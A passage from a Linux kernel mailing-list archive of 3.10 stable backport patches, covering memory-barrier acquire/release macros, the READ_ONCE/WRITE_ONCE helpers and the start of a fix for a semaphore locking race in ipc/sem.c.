+
 #else
+
 # define smp_mb()	barrier()
 # define smp_rmb()	barrier()
 # define smp_wmb()	barrier()
 # define smp_read_barrier_depends()	do { } while(0)
+
 #endif
 
 /*
+ * IA64 GCC turns volatile stores into st.rel and volatile loads into ld.acq no
+ * need for asm trickery!
+ */
+
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	___p1;								\
+})
+
+/*
  * XXX check on this ---I suspect what Linus really wants here is
  * acquire vs release semantics but we can't discuss this stuff with
  * Linus just yet.  Grrr...
diff --git a/arch/metag/include/asm/barrier.h b/arch/metag/include/asm/barrier.h
index e355a4c..2d6f0de 100644
--- a/arch/metag/include/asm/barrier.h
+++ b/arch/metag/include/asm/barrier.h
@@ -85,4 +85,19 @@ static inline void fence(void)
 #define smp_read_barrier_depends()     do { } while (0)
 #define set_mb(var, value) do { var = value; smp_mb(); } while (0)
 
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	___p1;								\
+})
+
 #endif /* _ASM_METAG_BARRIER_H */
diff --git a/arch/mips/include/asm/barrier.h b/arch/mips/include/asm/barrier.h
index 314ab55..52c5b61 100644
--- a/arch/mips/include/asm/barrier.h
+++ b/arch/mips/include/asm/barrier.h
@@ -180,4 +180,19 @@
 #define nudge_writes() mb()
 #endif
 
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	___p1;								\
+})
+
 #endif /* __ASM_BARRIER_H */
diff --git a/arch/powerpc/include/asm/barrier.h b/arch/powerpc/include/asm/barrier.h
index ae78225..f89da80 100644
--- a/arch/powerpc/include/asm/barrier.h
+++ b/arch/powerpc/include/asm/barrier.h
@@ -45,11 +45,15 @@
 #    define SMPWMB      eieio
 #endif
 
+#define __lwsync()	__asm__ __volatile__ (stringify_in_c(LWSYNC) : : :"memory")
+
 #define smp_mb()	mb()
-#define smp_rmb()	__asm__ __volatile__ (stringify_in_c(LWSYNC) : : :"memory")
+#define smp_rmb()	__lwsync()
 #define smp_wmb()	__asm__ __volatile__ (stringify_in_c(SMPWMB) : : :"memory")
 #define smp_read_barrier_depends()	read_barrier_depends()
 #else
+#define __lwsync()	barrier()
+
 #define smp_mb()	barrier()
 #define smp_rmb()	barrier()
 #define smp_wmb()	barrier()
@@ -65,4 +69,19 @@
 #define data_barrier(x)	\
 	asm volatile("twi 0,%0,0; isync" : : "r" (x) : "memory");
 
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	__lwsync();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	__lwsync();							\
+	___p1;								\
+})
+
 #endif /* _ASM_POWERPC_BARRIER_H */
diff --git a/arch/s390/include/asm/barrier.h b/arch/s390/include/asm/barrier.h
index 16760ee..578680f 100644
--- a/arch/s390/include/asm/barrier.h
+++ b/arch/s390/include/asm/barrier.h
@@ -32,4 +32,19 @@
 
 #define set_mb(var, value)		do { var = value; mb(); } while (0)
 
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	___p1;								\
+})
+
 #endif /* __ASM_BARRIER_H */
diff --git a/arch/sparc/include/asm/barrier_64.h b/arch/sparc/include/asm/barrier_64.h
index 95d4598..b5aad96 100644
--- a/arch/sparc/include/asm/barrier_64.h
+++ b/arch/sparc/include/asm/barrier_64.h
@@ -53,4 +53,19 @@ do {	__asm__ __volatile__("ba,pt	%%xcc, 1f\n\t" \
 
 #define smp_read_barrier_depends()	do { } while(0)
 
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	___p1;								\
+})
+
 #endif /* !(__SPARC64_BARRIER_H) */
diff --git a/arch/x86/include/asm/barrier.h b/arch/x86/include/asm/barrier.h
index c6cd358..04a4890 100644
--- a/arch/x86/include/asm/barrier.h
+++ b/arch/x86/include/asm/barrier.h
@@ -92,12 +92,53 @@
 #endif
 #define smp_read_barrier_depends()	read_barrier_depends()
 #define set_mb(var, value) do { (void)xchg(&var, value); } while (0)
-#else
+#else /* !SMP */
 #define smp_mb()	barrier()
 #define smp_rmb()	barrier()
 #define smp_wmb()	barrier()
 #define smp_read_barrier_depends()	do { } while (0)
 #define set_mb(var, value) do { var = value; barrier(); } while (0)
+#endif /* SMP */
+
+#if defined(CONFIG_X86_OOSTORE) || defined(CONFIG_X86_PPRO_FENCE)
+
+/*
+ * For either of these options x86 doesn't have a strong TSO memory
+ * model and we should fall back to full barriers.
+ */
+
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	___p1;								\
+})
+
+#else /* regular x86 TSO memory ordering */
+
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	___p1;								\
+})
+
 #endif
 
 /*
diff --git a/include/asm-generic/barrier.h b/include/asm-generic/barrier.h
index 639d7a4..01613b3 100644
--- a/include/asm-generic/barrier.h
+++ b/include/asm-generic/barrier.h
@@ -46,5 +46,20 @@
 #define read_barrier_depends()		do {} while (0)
 #define smp_read_barrier_depends()	do {} while (0)
 
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	___p1;								\
+})
+
 #endif /* !__ASSEMBLY__ */
 #endif /* __ASM_GENERIC_BARRIER_H */
diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index a2ce6f8..6977192 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -302,6 +302,11 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
 # define __same_type(a, b) __builtin_types_compatible_p(typeof(a), typeof(b))
 #endif
 
+/* Is this type a native word size -- useful for atomic operations */
+#ifndef __native_word
+# define __native_word(t) (sizeof(t) == sizeof(int) || sizeof(t) == sizeof(long))
+#endif
+
 /* Compile time object size, -1 for unknown */
 #ifndef __compiletime_object_size
 # define __compiletime_object_size(obj) -1
@@ -341,6 +346,10 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
 #define compiletime_assert(condition, msg) \
 	_compiletime_assert(condition, msg, __compiletime_assert_, __LINE__)
 
+#define compiletime_assert_atomic_type(t)				\
+	compiletime_assert(__native_word(t),				\
+		"Need native word sized stores/loads for atomicity.")
+
 /*
  * Prevent the compiler from merging or refetching accesses.  The compiler
  * is also forbidden from reordering successive instances of ACCESS_ONCE(),
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 277/319] kernel: Provide READ_ONCE and ASSIGN_ONCE
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (175 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 276/319] arch: Introduce smp_load_acquire(), smp_store_release() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-06  8:06   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 278/319] kernel: Change ASSIGN_ONCE(val, x) to WRITE_ONCE(x, val) Willy Tarreau
                   ` (41 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Christian Borntraeger, Willy Tarreau

From: Christian Borntraeger <borntraeger@de.ibm.com>

commit 230fa253df6352af12ad0a16128760b5cb3f92df upstream.

ACCESS_ONCE does not work reliably on non-scalar types. For
example gcc 4.6 and 4.7 might remove the volatile tag for such
accesses during the SRA (scalar replacement of aggregates) step
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=58145)

Let's provide READ_ONCE/ASSIGN_ONCE that will do all accesses via
scalar types as suggested by Linus Torvalds. Accesses larger than
the machines word size cannot be guaranteed to be atomic. These
macros will use memcpy and emit a build warning.

Signed-off-by: Christian Borntraeger <borntraeger@de.ibm.com>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/compiler.h | 74 ++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 74 insertions(+)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index 6977192..9df1978 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -179,6 +179,80 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
 # define __UNIQUE_ID(prefix) __PASTE(__PASTE(__UNIQUE_ID_, prefix), __LINE__)
 #endif
 
+#include <uapi/linux/types.h>
+
+static __always_inline void data_access_exceeds_word_size(void)
+#ifdef __compiletime_warning
+__compiletime_warning("data access exceeds word size and won't be atomic")
+#endif
+;
+
+static __always_inline void data_access_exceeds_word_size(void)
+{
+}
+
+static __always_inline void __read_once_size(volatile void *p, void *res, int size)
+{
+	switch (size) {
+	case 1: *(__u8 *)res = *(volatile __u8 *)p; break;
+	case 2: *(__u16 *)res = *(volatile __u16 *)p; break;
+	case 4: *(__u32 *)res = *(volatile __u32 *)p; break;
+#ifdef CONFIG_64BIT
+	case 8: *(__u64 *)res = *(volatile __u64 *)p; break;
+#endif
+	default:
+		barrier();
+		__builtin_memcpy((void *)res, (const void *)p, size);
+		data_access_exceeds_word_size();
+		barrier();
+	}
+}
+
+static __always_inline void __assign_once_size(volatile void *p, void *res, int size)
+{
+	switch (size) {
+	case 1: *(volatile __u8 *)p = *(__u8 *)res; break;
+	case 2: *(volatile __u16 *)p = *(__u16 *)res; break;
+	case 4: *(volatile __u32 *)p = *(__u32 *)res; break;
+#ifdef CONFIG_64BIT
+	case 8: *(volatile __u64 *)p = *(__u64 *)res; break;
+#endif
+	default:
+		barrier();
+		__builtin_memcpy((void *)p, (const void *)res, size);
+		data_access_exceeds_word_size();
+		barrier();
+	}
+}
+
+/*
+ * Prevent the compiler from merging or refetching reads or writes. The
+ * compiler is also forbidden from reordering successive instances of
+ * READ_ONCE, ASSIGN_ONCE and ACCESS_ONCE (see below), but only when the
+ * compiler is aware of some particular ordering.  One way to make the
+ * compiler aware of ordering is to put the two invocations of READ_ONCE,
+ * ASSIGN_ONCE or ACCESS_ONCE() in different C statements.
+ *
+ * In contrast to ACCESS_ONCE these two macros will also work on aggregate
+ * data types like structs or unions. If the size of the accessed data
+ * type exceeds the word size of the machine (e.g., 32 bits or 64 bits)
+ * READ_ONCE() and ASSIGN_ONCE()  will fall back to memcpy and print a
+ * compile-time warning.
+ *
+ * Their two major use cases are: (1) Mediating communication between
+ * process-level code and irq/NMI handlers, all running on the same CPU,
+ * and (2) Ensuring that the compiler does not  fold, spindle, or otherwise
+ * mutilate accesses that either do not require ordering or that interact
+ * with an explicit memory barrier or atomic instruction that provides the
+ * required ordering.
+ */
+
+#define READ_ONCE(x) \
+	({ typeof(x) __val; __read_once_size(&x, &__val, sizeof(__val)); __val; })
+
+#define ASSIGN_ONCE(val, x) \
+	({ typeof(x) __val; __val = val; __assign_once_size(&x, &__val, sizeof(__val)); __val; })
+
 #endif /* __KERNEL__ */
 
 #endif /* __ASSEMBLY__ */
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 278/319] kernel: Change ASSIGN_ONCE(val, x) to WRITE_ONCE(x, val)
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (176 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 277/319] kernel: Provide READ_ONCE and ASSIGN_ONCE Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-06  8:06   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 279/319] kernel: make READ_ONCE() valid on const arguments Willy Tarreau
                   ` (40 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Christian Borntraeger, Willy Tarreau

From: Christian Borntraeger <borntraeger@de.ibm.com>

commit 43239cbe79fc369f5d2160bd7f69e28b5c50a58c upstream.

Feedback has shown that WRITE_ONCE(x, val) is easier to use than
ASSIGN_ONCE(val,x).
There are no in-tree users yet, so lets change it for 3.19.

Signed-off-by: Christian Borntraeger <borntraeger@de.ibm.com>
Acked-by: Peter Zijlstra <peterz@infradead.org>
Acked-by: Davidlohr Bueso <dave@stgolabs.net>
Acked-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/compiler.h | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index 9df1978..236a4e3 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -208,7 +208,7 @@ static __always_inline void __read_once_size(volatile void *p, void *res, int si
 	}
 }
 
-static __always_inline void __assign_once_size(volatile void *p, void *res, int size)
+static __always_inline void __write_once_size(volatile void *p, void *res, int size)
 {
 	switch (size) {
 	case 1: *(volatile __u8 *)p = *(__u8 *)res; break;
@@ -228,15 +228,15 @@ static __always_inline void __assign_once_size(volatile void *p, void *res, int
 /*
  * Prevent the compiler from merging or refetching reads or writes. The
  * compiler is also forbidden from reordering successive instances of
- * READ_ONCE, ASSIGN_ONCE and ACCESS_ONCE (see below), but only when the
+ * READ_ONCE, WRITE_ONCE and ACCESS_ONCE (see below), but only when the
  * compiler is aware of some particular ordering.  One way to make the
  * compiler aware of ordering is to put the two invocations of READ_ONCE,
- * ASSIGN_ONCE or ACCESS_ONCE() in different C statements.
+ * WRITE_ONCE or ACCESS_ONCE() in different C statements.
  *
  * In contrast to ACCESS_ONCE these two macros will also work on aggregate
  * data types like structs or unions. If the size of the accessed data
  * type exceeds the word size of the machine (e.g., 32 bits or 64 bits)
- * READ_ONCE() and ASSIGN_ONCE()  will fall back to memcpy and print a
+ * READ_ONCE() and WRITE_ONCE()  will fall back to memcpy and print a
  * compile-time warning.
  *
  * Their two major use cases are: (1) Mediating communication between
@@ -250,8 +250,8 @@ static __always_inline void __assign_once_size(volatile void *p, void *res, int
 #define READ_ONCE(x) \
 	({ typeof(x) __val; __read_once_size(&x, &__val, sizeof(__val)); __val; })
 
-#define ASSIGN_ONCE(val, x) \
-	({ typeof(x) __val; __val = val; __assign_once_size(&x, &__val, sizeof(__val)); __val; })
+#define WRITE_ONCE(x, val) \
+	({ typeof(x) __val; __val = val; __write_once_size(&x, &__val, sizeof(__val)); __val; })
 
 #endif /* __KERNEL__ */
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 279/319] kernel: make READ_ONCE() valid on const arguments
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (177 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 278/319] kernel: Change ASSIGN_ONCE(val, x) to WRITE_ONCE(x, val) Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-06  8:05   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 280/319] locking: Remove atomicy checks from {READ,WRITE}_ONCE Willy Tarreau
                   ` (39 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Linus Torvalds, Christian Borntraeger, Willy Tarreau

From: Linus Torvalds <torvalds@linux-foundation.org>

commit dd36929720f40f17685e841ae0d4c581c165ea60 upstream.

The use of READ_ONCE() causes lots of warnings witht he pending paravirt
spinlock fixes, because those ends up having passing a member to a
'const' structure to READ_ONCE().

There should certainly be nothing wrong with using READ_ONCE() with a
const source, but the helper function __read_once_size() would cause
warnings because it would drop the 'const' qualifier, but also because
the destination would be marked 'const' too due to the use of 'typeof'.

Use a union of types in READ_ONCE() to avoid this issue.

Also make sure to use parenthesis around the macro arguments to avoid
possible operator precedence issues.

Tested-by: Ingo Molnar <mingo@kernel.org>
Cc: Christian Borntraeger <borntraeger@de.ibm.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/compiler.h | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index 236a4e3..c6d06e9 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -191,7 +191,7 @@ static __always_inline void data_access_exceeds_word_size(void)
 {
 }
 
-static __always_inline void __read_once_size(volatile void *p, void *res, int size)
+static __always_inline void __read_once_size(const volatile void *p, void *res, int size)
 {
 	switch (size) {
 	case 1: *(__u8 *)res = *(volatile __u8 *)p; break;
@@ -248,10 +248,10 @@ static __always_inline void __write_once_size(volatile void *p, void *res, int s
  */
 
 #define READ_ONCE(x) \
-	({ typeof(x) __val; __read_once_size(&x, &__val, sizeof(__val)); __val; })
+	({ union { typeof(x) __val; char __c[1]; } __u; __read_once_size(&(x), __u.__c, sizeof(x)); __u.__val; })
 
 #define WRITE_ONCE(x, val) \
-	({ typeof(x) __val; __val = val; __write_once_size(&x, &__val, sizeof(__val)); __val; })
+	({ typeof(x) __val = (val); __write_once_size(&(x), &__val, sizeof(__val)); __val; })
 
 #endif /* __KERNEL__ */
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 280/319] locking: Remove atomicy checks from {READ,WRITE}_ONCE
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (178 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 279/319] kernel: make READ_ONCE() valid on const arguments Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-06  8:05   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 281/319] compiler: Allow 1- and 2-byte smp_load_acquire() and smp_store_release() Willy Tarreau
                   ` (38 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Peter Zijlstra, Davidlohr Bueso, H . Peter Anvin, Paul McKenney,
	Stephen Rothwell, Thomas Gleixner, Ingo Molnar, Willy Tarreau

From: Peter Zijlstra <peterz@infradead.org>

commit 7bd3e239d6c6d1cad276e8f130b386df4234dcd7 upstream.

The fact that volatile allows for atomic load/stores is a special case
not a requirement for {READ,WRITE}_ONCE(). Their primary purpose is to
force the compiler to emit load/stores _once_.

Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Acked-by: Christian Borntraeger <borntraeger@de.ibm.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Acked-by: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Davidlohr Bueso <dave@stgolabs.net>
Cc: H. Peter Anvin <hpa@zytor.com>
Cc: Paul McKenney <paulmck@linux.vnet.ibm.com>
Cc: Stephen Rothwell <sfr@canb.auug.org.au>
Cc: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Ingo Molnar <mingo@kernel.org>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/compiler.h | 16 ----------------
 1 file changed, 16 deletions(-)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index c6d06e9..53563d8 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -181,29 +181,16 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
 
 #include <uapi/linux/types.h>
 
-static __always_inline void data_access_exceeds_word_size(void)
-#ifdef __compiletime_warning
-__compiletime_warning("data access exceeds word size and won't be atomic")
-#endif
-;
-
-static __always_inline void data_access_exceeds_word_size(void)
-{
-}
-
 static __always_inline void __read_once_size(const volatile void *p, void *res, int size)
 {
 	switch (size) {
 	case 1: *(__u8 *)res = *(volatile __u8 *)p; break;
 	case 2: *(__u16 *)res = *(volatile __u16 *)p; break;
 	case 4: *(__u32 *)res = *(volatile __u32 *)p; break;
-#ifdef CONFIG_64BIT
 	case 8: *(__u64 *)res = *(volatile __u64 *)p; break;
-#endif
 	default:
 		barrier();
 		__builtin_memcpy((void *)res, (const void *)p, size);
-		data_access_exceeds_word_size();
 		barrier();
 	}
 }
@@ -214,13 +201,10 @@ static __always_inline void __write_once_size(volatile void *p, void *res, int s
 	case 1: *(volatile __u8 *)p = *(__u8 *)res; break;
 	case 2: *(volatile __u16 *)p = *(__u16 *)res; break;
 	case 4: *(volatile __u32 *)p = *(__u32 *)res; break;
-#ifdef CONFIG_64BIT
 	case 8: *(volatile __u64 *)p = *(__u64 *)res; break;
-#endif
 	default:
 		barrier();
 		__builtin_memcpy((void *)p, (const void *)res, size);
-		data_access_exceeds_word_size();
 		barrier();
 	}
 }
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 281/319] compiler: Allow 1- and 2-byte smp_load_acquire() and smp_store_release()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (179 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 280/319] locking: Remove atomicy checks from {READ,WRITE}_ONCE Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-06  8:05   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 282/319] ipc/sem.c: fix complex_count vs. simple op race Willy Tarreau
                   ` (37 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Paul E. McKenney, Peter Zijlstra, Willy Tarreau

From: "Paul E. McKenney" <paulmck@linux.vnet.ibm.com>

commit 536fa402221f09633e7c5801b327055ab716a363 upstream.

CPUs without single-byte and double-byte loads and stores place some
"interesting" requirements on concurrent code.  For example (adapted
from Peter Hurley's test code), suppose we have the following structure:

	struct foo {
		spinlock_t lock1;
		spinlock_t lock2;
		char a; /* Protected by lock1. */
		char b; /* Protected by lock2. */
	};
	struct foo *foop;

Of course, it is common (and good) practice to place data protected
by different locks in separate cache lines.  However, if the locks are
rarely acquired (for example, only in rare error cases), and there are
a great many instances of the data structure, then memory footprint can
trump false-sharing concerns, so that it can be better to place them in
the same cache cache line as above.

But if the CPU does not support single-byte loads and stores, a store
to foop->a will do a non-atomic read-modify-write operation on foop->b,
which will come as a nasty surprise to someone holding foop->lock2.  So we
now require CPUs to support single-byte and double-byte loads and stores.
Therefore, this commit adjusts the definition of __native_word() to allow
these sizes to be used by smp_load_acquire() and smp_store_release().

Signed-off-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
Cc: Peter Zijlstra <peterz@infradead.org>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/compiler.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index 53563d8..453da7b 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -362,7 +362,7 @@ static __always_inline void __write_once_size(volatile void *p, void *res, int s
 
 /* Is this type a native word size -- useful for atomic operations */
 #ifndef __native_word
-# define __native_word(t) (sizeof(t) == sizeof(int) || sizeof(t) == sizeof(long))
+# define __native_word(t) (sizeof(t) == sizeof(char) || sizeof(t) == sizeof(short) || sizeof(t) == sizeof(int) || sizeof(t) == sizeof(long))
 #endif
 
 /* Compile time object size, -1 for unknown */
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 282/319] ipc/sem.c: fix complex_count vs. simple op race
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (180 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 281/319] compiler: Allow 1- and 2-byte smp_load_acquire() and smp_store_release() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-06  8:04   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 283/319] cfq: fix starvation of asynchronous writes Willy Tarreau
                   ` (36 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Manfred Spraul, H. Peter Anvin, Peter Zijlstra, Davidlohr Bueso,
	Thomas Gleixner, Ingo Molnar, 1vier1, Andrew Morton,
	Linus Torvalds, Jiri Slaby, Willy Tarreau

From: Manfred Spraul <manfred@colorfullife.com>

commit 5864a2fd3088db73d47942370d0f7210a807b9bc upstream.

Commit 6d07b68ce16a ("ipc/sem.c: optimize sem_lock()") introduced a
race:

sem_lock has a fast path that allows parallel simple operations.
There are two reasons why a simple operation cannot run in parallel:
 - a non-simple operations is ongoing (sma->sem_perm.lock held)
 - a complex operation is sleeping (sma->complex_count != 0)

As both facts are stored independently, a thread can bypass the current
checks by sleeping in the right positions.  See below for more details
(or kernel bugzilla 105651).

The patch fixes that by creating one variable (complex_mode)
that tracks both reasons why parallel operations are not possible.

The patch also updates stale documentation regarding the locking.

With regards to stable kernels:
The patch is required for all kernels that include the
commit 6d07b68ce16a ("ipc/sem.c: optimize sem_lock()") (3.10?)

The alternative is to revert the patch that introduced the race.

The patch is safe for backporting, i.e. it makes no assumptions
about memory barriers in spin_unlock_wait().

Background:
Here is the race of the current implementation:

Thread A: (simple op)
- does the first "sma->complex_count == 0" test

Thread B: (complex op)
- does sem_lock(): This includes an array scan. But the scan can't
  find Thread A, because Thread A does not own sem->lock yet.
- the thread does the operation, increases complex_count,
  drops sem_lock, sleeps

Thread A:
- spin_lock(&sem->lock), spin_is_locked(sma->sem_perm.lock)
- sleeps before the complex_count test

Thread C: (complex op)
- does sem_lock (no array scan, complex_count==1)
- wakes up Thread B.
- decrements complex_count

Thread A:
- does the complex_count test

Bug:
Now both thread A and thread C operate on the same array, without
any synchronization.

[js] use set_mb instead of smp_store_mb

Fixes: 6d07b68ce16a ("ipc/sem.c: optimize sem_lock()")
Link: http://lkml.kernel.org/r/1469123695-5661-1-git-send-email-manfred@colorfullife.com
Reported-by: <felixh@informatik.uni-bremen.de>
Cc: "H. Peter Anvin" <hpa@zytor.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Davidlohr Bueso <dave@stgolabs.net>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Ingo Molnar <mingo@elte.hu>
Cc: <1vier1@web.de>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/sem.h |   1 +
 ipc/sem.c           | 129 ++++++++++++++++++++++++++++++----------------------
 2 files changed, 76 insertions(+), 54 deletions(-)

diff --git a/include/linux/sem.h b/include/linux/sem.h
index 976ce3a..d0efd6e 100644
--- a/include/linux/sem.h
+++ b/include/linux/sem.h
@@ -21,6 +21,7 @@ struct sem_array {
 	struct list_head	list_id;	/* undo requests on this array */
 	int			sem_nsems;	/* no. of semaphores in array */
 	int			complex_count;	/* pending complex operations */
